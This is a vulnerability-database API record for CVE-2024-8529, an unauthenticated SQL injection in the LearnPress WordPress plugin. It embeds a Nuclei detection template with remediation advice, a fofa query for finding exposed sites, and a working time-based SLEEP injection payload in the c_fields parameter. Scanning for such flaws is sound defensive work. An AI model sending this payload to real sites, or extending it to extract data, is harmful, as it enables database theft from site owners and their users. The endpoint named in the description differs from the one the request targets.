{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-8529/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-8529/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-8529/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-8529/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-8529/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-8529/enrichment"},"sightings":{"href":"/api/v1/sightings/cve-2024-8529"},"vulnerability":{"href":"/api/v1/vulnerability/cve-2024-8529"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-8529.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2024-8529\n\ninfo:\n  name: LearnPress < 4.2.7.1 - SQL Injection\n  author: ritikchaddha,iacker\n  severity: critical\n  description: |\n    The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.\n  impact: |\n    Unauthenticated attackers can exploit SQL injection through the c_fields parameter to extract sensitive database information including user credentials, course data, and personal information from the LearnPress LMS.\n  remediation: |\n    Update the LearnPress plugin to version 4.2.7.1 or later.\n  reference:\n    - https://wpscan.com/vulnerability/6b86c089-177b-45b4-979e-4ae08e586e83/\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-8529\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2024-8529\n    cwe-id: CWE-89\n    epss-score: 0.12056\n    epss-percentile: 0.96157\n    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*\n  metadata:\n    max-request: 1\n    verified: true\n    fofa-query: body=\"wp-content/plugins/learnpress\"\n    vendor: thimpress\n    product: learnpress\n  tags: cve,cve2024,wordpress,wp-plugin,wp,learnpress,sqli,time-based-sqli,vkev,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/learnpress/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"LearnPress\", \"WordPress LMS Plugin\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 30s\n        GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(8)))a)/*{{randstr}}*/ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=8'\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n# digest: 4a0a0047304502205d158086b59b7d171914420bd116869ed8931070b8bc3df7b28cc40f3cc875de0221008dd36b19d3293fd42eccbacb1b1e45f0027a132d8820b46cf2f0060ada8df532:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-8529"}